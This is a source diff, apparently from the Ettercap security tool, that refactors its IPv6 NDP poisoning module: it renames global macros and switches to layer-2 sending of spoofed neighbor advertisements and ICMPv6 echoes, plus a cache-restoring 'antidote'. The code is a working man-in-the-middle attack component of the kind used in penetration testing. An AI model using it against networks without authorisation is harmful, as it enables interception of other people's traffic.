@@ -68,18 +68,16 @@ static int ndp_poison_start(char *args)
    if(strcmp(args, "")) {
       for(p = strsep(&args, ","); p != NULL; p = strsep(&args, ",")) {
          if(!strcasecmp(p, "remote"))
-            GBL_OPTIONS->remote = 1;
+            EC_GBL_OPTIONS->remote = 1;
          else if(!strcasecmp(p, "oneway"))
             flags |= ND_ONEWAY;
          else
             SEMIFATAL_ERROR("NDP poisoning: incorrect arguments.\n");
       }
-   } else {
-      SEMIFATAL_ERROR("NDP poisoning: missing arguments.\n");
    }
 
    /* we need the host list */
-   if (LIST_EMPTY(&GBL_HOSTLIST)) 
+   if (LIST_EMPTY(&EC_GBL_HOSTLIST)) 
       SEMIFATAL_ERROR("NDP poisoning needs a non-emtpy hosts list.\n");
 
    /* clean the lists */
@@ -92,7 +90,7 @@ static int ndp_poison_start(char *args)
       SAFE_FREE(h);
    }
 
-   if(GBL_OPTIONS->silent) {
+   if(EC_GBL_OPTIONS->silent) {
       ret = create_list_silent();
    } else 
       ret = create_list();
@@ -144,7 +142,7 @@ static void ndp_poison_stop(void)
    }
 
    /* reset the remote flag */
-   GBL_OPTIONS->remote = 0;
+   EC_GBL_OPTIONS->remote = 0;
 
    return;
 }
@@ -172,7 +170,7 @@ EC_THREAD_FUNC(ndp_poisoner)
             if(!ip_addr_cmp(&t1->ip, &t2->ip))
                continue;
 
-            if (!GBL_CONF->ndp_poison_equal_mac)
+            if (!EC_GBL_CONF->ndp_poison_equal_mac)
                /* skip equal mac addresses ... */
                if (!memcmp(t1->mac, t2->mac, MEDIA_ADDR_LEN))
                   continue;
@@ -181,26 +179,28 @@ EC_THREAD_FUNC(ndp_poisoner)
              * send spoofed ICMP packet to trigger a neighbor cache
              * entry in the victims cache
              */
-           if (i == 1 && GBL_CONF->ndp_poison_icmp) {
-              send_icmp6_echo(&t2->ip, &t1->ip);
+           if (i == 1 && EC_GBL_CONF->ndp_poison_icmp) {
+              send_L2_icmp6_echo(&t2->ip, &t1->ip, t1->mac);
               /* from T2 to T1 */
               if (!(flags & ND_ONEWAY)) 
-                 send_icmp6_echo(&t1->ip, &t2->ip);
+                 send_L2_icmp6_echo(&t1->ip, &t2->ip, t2->mac);
            } 
 
-            send_icmp6_nadv(&t1->ip, &t2->ip, GBL_IFACE->mac, flags);
+            send_L2_icmp6_nadv(&t1->ip, &t2->ip, EC_GBL_IFACE->mac, flags, t2->mac);
             if(!(flags & ND_ONEWAY))
-               send_icmp6_nadv(&t2->ip, &t1->ip, GBL_IFACE->mac, flags & ND_ROUTER);
+               send_L2_icmp6_nadv(&t2->ip, &t1->ip, EC_GBL_IFACE->mac, flags & ND_ROUTER, t1->mac);
 
-            ec_usleep(GBL_CONF->ndp_poison_send_delay);
+            ec_usleep(EC_GBL_CONF->ndp_poison_send_delay);
          }
       }
 
       /* first warm up then release poison frequency */
-      if (i < 5) 
-         ec_usleep(SEC2MICRO(GBL_CONF->ndp_poison_warm_up));
+      if (i < 5) {
+         i++;
+         ec_usleep(SEC2MICRO(EC_GBL_CONF->ndp_poison_warm_up));
+      }
       else 
-         ec_usleep(SEC2MICRO(GBL_CONF->ndp_poison_delay));
+         ec_usleep(SEC2MICRO(EC_GBL_CONF->ndp_poison_delay));
 
    }
 
@@ -220,9 +220,9 @@ static int create_list(void)
 
 
    /* the first group */
-   LIST_FOREACH(i, &GBL_TARGET1->ip6, next) {
+   LIST_FOREACH(i, &EC_GBL_TARGET1->ip6, next) {
       /* walk through TARGET1 selected IPv6 addresses */
-      LIST_FOREACH(h, &GBL_HOSTLIST, next) {
+      LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) {
          /* search matching entry in host list */
          if (!ip_addr_cmp(&i->ip, &h->ip)) {
             USER_MSG(" GROUP 1 : %s %s\n",
@@ -241,12 +241,12 @@ static int create_list(void)
    }
 
    /* the target is NULL - convert to ANY */
-   if (LIST_FIRST(&GBL_TARGET1->ip6) == NULL) {
+   if (LIST_FIRST(&EC_GBL_TARGET1->ip6) == NULL) {
 
       USER_MSG(" GROUP 1 : ANY (all IPv6 hosts in the list)\n");
 
       /* add all hosts in HOSTLIST */
-      LIST_FOREACH(h, &GBL_HOSTLIST, next) {
+      LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) {
 
          /* only IPv6 addresses are applicable */
          if (ntohs(h->ip.addr_type) != AF_INET6) 
@@ -267,9 +267,9 @@ static int create_list(void)
    /* the second group */
 
    /* if the target was specified */
-   LIST_FOREACH(i, &GBL_TARGET2->ip6, next) {
+   LIST_FOREACH(i, &EC_GBL_TARGET2->ip6, next) {
    /* walk through TARGET1 selected IPv6 addresses */
-      LIST_FOREACH(h, &GBL_HOSTLIST, next) {
+      LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) {
          /* search matching entry in host list */
          if (!ip_addr_cmp(&i->ip, &h->ip)) {
             USER_MSG(" GROUP 2 : %s %s\n",
@@ -288,12 +288,12 @@ static int create_list(void)
    }
 
    /* the target is NULL - convert to ANY */
-   if (LIST_FIRST(&GBL_TARGET2->ip6) == NULL) {
+   if (LIST_FIRST(&EC_GBL_TARGET2->ip6) == NULL) {
 
       USER_MSG(" GROUP 2 : ANY (all IPv6 hosts in the list)\n");
 
       /* add them */
-      LIST_FOREACH(h, &GBL_HOSTLIST, next) {
+      LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) {
 
          /* only IPv6 addresses are applicable */
          if (ntohs(h->ip.addr_type) != AF_INET6) 
@@ -321,20 +321,20 @@ static int create_list_silent(void)
 
    DEBUG_MSG("create_list_silent");
 
-   LIST_FOREACH(i, &GBL_TARGET1->ip6, next) {
+   LIST_FOREACH(i, &EC_GBL_TARGET1->ip6, next) {
       if(ip_addr_is_local(&i->ip, NULL) == E_SUCCESS) {
-         if (!memcmp(GBL_TARGET1->mac, "\x00\x00\x00\x00\x00\x00", MEDIA_ADDR_LEN)) {
+         if (!memcmp(EC_GBL_TARGET1->mac, "\x00\x00\x00\x00\x00\x00", MEDIA_ADDR_LEN)) {
             USER_MSG("\nERROR: MAC address must be specified in silent mode.\n");
             return -E_FATAL;
          }
          SAFE_CALLOC(h, 1, sizeof(struct hosts_list));
          memcpy(&h->ip, &i->ip, sizeof(struct ip_addr));
-         memcpy(&h->mac, &GBL_TARGET1->mac, MEDIA_ADDR_LEN);
+         memcpy(&h->mac, &EC_GBL_TARGET1->mac, MEDIA_ADDR_LEN);
          LIST_INSERT_HEAD(&ndp_group_one, h, next);
 
          USER_MSG(" TARGET 1 : %-40s %17s\n", 
                ip_addr_ntoa(&i->ip, tmp),
-               mac_addr_ntoa(GBL_TARGET1->mac, tmp2));
+               mac_addr_ntoa(EC_GBL_TARGET1->mac, tmp2));
       }
       else {
          USER_MSG("%s is not local. NDP poisoning impossible\n", 
@@ -343,20 +343,20 @@ static int create_list_silent(void)
       }
    }
 
-   LIST_FOREACH(i, &GBL_TARGET2->ip6, next) {
+   LIST_FOREACH(i, &EC_GBL_TARGET2->ip6, next) {
       if(ip_addr_is_local(&i->ip, NULL) == E_SUCCESS) {
-         if (!memcmp(GBL_TARGET2->mac, "\x00\x00\x00\x00\x00\x00", MEDIA_ADDR_LEN)) {
+         if (!memcmp(EC_GBL_TARGET2->mac, "\x00\x00\x00\x00\x00\x00", MEDIA_ADDR_LEN)) {
             USER_MSG("\nERROR: MAC address must be specified in silent mode.\n");
             return -E_FATAL;
          }
          SAFE_CALLOC(h, 1, sizeof(struct hosts_list));
          memcpy(&h->ip, &i->ip, sizeof(struct ip_addr));
-         memcpy(&h->mac, &GBL_TARGET2->mac, MEDIA_ADDR_LEN);
+         memcpy(&h->mac, &EC_GBL_TARGET2->mac, MEDIA_ADDR_LEN);
          LIST_INSERT_HEAD(&ndp_group_two, h, next);
 
          USER_MSG(" TARGET 2 : %-40s %17s\n", 
                ip_addr_ntoa(&i->ip, tmp),
-               mac_addr_ntoa(GBL_TARGET2->mac, tmp2));
+               mac_addr_ntoa(EC_GBL_TARGET2->mac, tmp2));
       }
       else {
          USER_MSG("%s is not local. NDP poisoning impossible\n", 
@@ -384,21 +384,21 @@ static void ndp_antidote(void)
             if(!ip_addr_cmp(&h1->ip, &h2->ip))
                continue;
 
-            if (!GBL_CONF->ndp_poison_equal_mac)
+            if (!EC_GBL_CONF->ndp_poison_equal_mac)
                /* skip equal mac addresses ... */
                if (!memcmp(h1->mac, h2->mac, MEDIA_ADDR_LEN))
                   continue;
 
             /* send neighbor advertisements with the correct information */
-            send_icmp6_nadv(&h1->ip, &h2->ip, h1->mac, flags);
+            send_L2_icmp6_nadv(&h1->ip, &h2->ip, h1->mac, flags, h2->mac);
             if(!(flags & ND_ONEWAY))
-               send_icmp6_nadv(&h2->ip, &h1->ip, h2->mac, flags & ND_ROUTER);
+               send_L2_icmp6_nadv(&h2->ip, &h1->ip, h2->mac, flags & ND_ROUTER, h1->mac);
 
-            ec_usleep(GBL_CONF->ndp_poison_send_delay);
+            ec_usleep(EC_GBL_CONF->ndp_poison_send_delay);
          }
       }
 
-      ec_usleep(SEC2MICRO(GBL_CONF->ndp_poison_warm_up));
+      ec_usleep(SEC2MICRO(EC_GBL_CONF->ndp_poison_warm_up));
    }
 }
 
